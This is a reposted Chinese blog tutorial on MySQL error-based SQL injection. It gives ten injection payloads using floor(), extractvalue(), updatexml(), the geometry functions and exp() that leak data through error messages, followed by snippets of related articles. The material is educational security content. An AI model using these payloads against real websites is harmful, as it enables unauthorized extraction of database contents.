SQl报错注入

最新推荐文章于 2024-12-08 12:33:50 发布
转载 最新推荐文章于 2024-12-08 12:33:50 发布 · 403 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html
文章标签:

#sql

本文介绍MySQL中的报错注入技术,包括使用floor、extractvalue、updatexml等函数触发错误来泄露信息的方法,并列举了十种不同的报错注入示例。

报错注入:extractvalue、updatexml报错原理

https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html

学习基于extractvalue()和updatexml()的报错注入

https://blog.youkuaiyun.com/zpy1998zpy/article/details/80631036

sql基于 extractvalue(),floor(),updatexml()函数的报错注入

https://blog.youkuaiyun.com/qq_39101049/article/details/88839514

SQL注入——报错注入

https://www.cnblogs.com/richardlee97/p/10617115.html

mysql报错注入原理_Mysql报错注入之floor(rand(0)*2)报错原理探究

https://blog.youkuaiyun.com/weixin_31481495/article/details/113229331

sql预处理注入

floor(rand()*2)  报错

mysql> select count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a;

ERROR 1062 (23000): Duplicate entry 'test0' for key '<group_key>'

 

join  using 报错  

mysql> select * from (select * from test as a join (select * from test )b)c;

ERROR 1060 (42S21): Duplicate column name 'id'

mysql> select * from (select * from test as a join (select * from test )b using(id))c;

ERROR 1060 (42S21): Duplicate column name 'title'

mysql> select * from (select * from test as a join (select * from test )b using(id,title))c;

 

十种MySQL报错注入

以下均摘自《代码审计:企业级Web代码安全架构》一书

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

SQL报错注入
Ryongao
02-03 1231
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
【项目实战】SQL报错注入之updatexml的实现
qq_56394739的博客
12-17 1944
函数通过输入不符合XPATH格式的数据来触发报错,并利用这一点进行SQL注入,通过分析报错信息,可以判断是否存在注入点,并逐步爆出数据库名、表名、字段名以及敏感数据,感兴趣的可以了解一下。
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 1152
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
sql 报错注入
travelnight的博客
03-15 4424
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
sql注入报错注入
2302_79119987的博客
04-19 2713
实行注入的地方。
SQL注入---报错注入
qq_41592307的博客
09-03 409
报错注入 1、报错注入的原理 由于后台没有对报错信息进行过滤,报错信息会显示在前端,可以使用指定的函数来制造报错,由 此来获取数据信息。 2、报错函数 extractvalue(xml_frag,xpath_expr):对XML文档数据进行查询的XPATH函数 如果Xpath的输入错误,则会将错误信息结果显示在前端。 注:extractvalue()和updatexml()函数查询的最大长度为32位,如果超过32位则需要使用 substring()函数截取 ...
关于SQL报错注入原理详细解析
qq_45672254的博客
11-17 837
关于SQL报错注入原理详细解析 之前读过多篇关于Mysql报错注入之floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理:Mysql报错注入之floor(rand(0)*2)报错原理探究 在报错原理分析中,主要困惑我的地方
SQL注入报错注入
qq_68163788的博客
01-27 3587
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
[ctf web]sql报错注入
qq_37301470的博客
11-12 415
报错注入 一: exp,pow溢出报错 exp(int) 返回e的x次方 exp(~(select * from (select user())a)) ~:取反运算符 将字符串处理后变为大整数,报错 exp(710):报错 exp(709):不报错 绕过if,case的过滤进行基于报错的布尔盲注。 pow(int,int) 返回x的y次方 数值过大报错 pow(1+(sql表达式),99999999999999) 若sql语句为假则不报错 为真则报错 二:XML和Xpath基础 XML:标记
Sql注入-报错注入
WolvenSec的博客
06-06 2466
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql报错注入简单介绍
xiaolong22333的博客
08-12 415
sql报错注入 updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 。 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 。 作用:改变文档中符合条件的节点的值。 undatexml(1,(查询
新手小白入门——SQL注入报错注入
2401_89233381的博客
12-08 3571
主要利用数据库在执行某些函数或语句时产生的错误信息来获取数据。这种方法通常在目标系统对常规的SQL注入进行了一定防范(如过滤了常见的注入关键字等)的情况下使用。在MySQL中常见select/insert/update/delete/extratvalue注入可以使用报错方式来获取信息。updatexml()注入insert注入数据注入update注入delete注入extractvalue()注入
SQL注入报错注入方法汇总
wanggonghanfei的博客
10-03 2769
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
几种常见的报错注入类型详解
m0_74312676的博客
07-23 2468
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
学习MySQLselect语句
开心的小包子
12-21 322
select语句可 以用回车分隔 $sql="select * from article where id=1"和 $sql="select * from article where id=1" 都可以得到正确的结果,但有时分开写或许能 更明了一点,特别是当sql语句比较长时。 批量查询数据 可以用in 来实现 $sql="select * from article where i...
mysql语句执行逻辑_MySQL逻辑架构 - SQL语句的执行都经历了哪些步骤
weixin_35692916的博客
01-26 316
MySQL逻辑架构 - SQL语句的执行都经历了哪些步骤从 MySQL 架构来理解,我们可以把 MySQL 拆解成几个零件,如下图所示大体来说,MySQL 可以分为 Server层 和 存储引擎层两部分。Server 层包括连接器、查询缓存、分析器、优化器、执行器,涵盖MySQL的大多数核心服务功能,以及所有的内置函数(如日期、时间、数学和加密函数等),所有跨存储引擎的功能也在这一层实现,包括 存...
mysql where id_MySQL where 子句
weixin_31754073的博客
01-27 1981
MySQL where子句在上一节课我们已经提到了where子句,其作用就是用于限制条件。譬如说,现在我们要查询某个表中,id值大于12的所有记录,就可以这样果select * from where id>12可以看到这是一个典型的sql语句,其中select是查询的作用,* 表示将结果记录中的所有字段显出来,where在英语语里的意思,是条件的意思,这里也是用于限制指查询结果的条件,如果...
sql报错注入
最新发布
03-19
针对 SQL 报错注入问题,可以采取以下措施来保护数据库免受此类攻击。 #### 使用参数化查询 参数化查询是防止 SQL 注入的有效方法之一。通过将用户输入作为独立的参数传递给查询语句,而不是将其嵌入到字符串中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值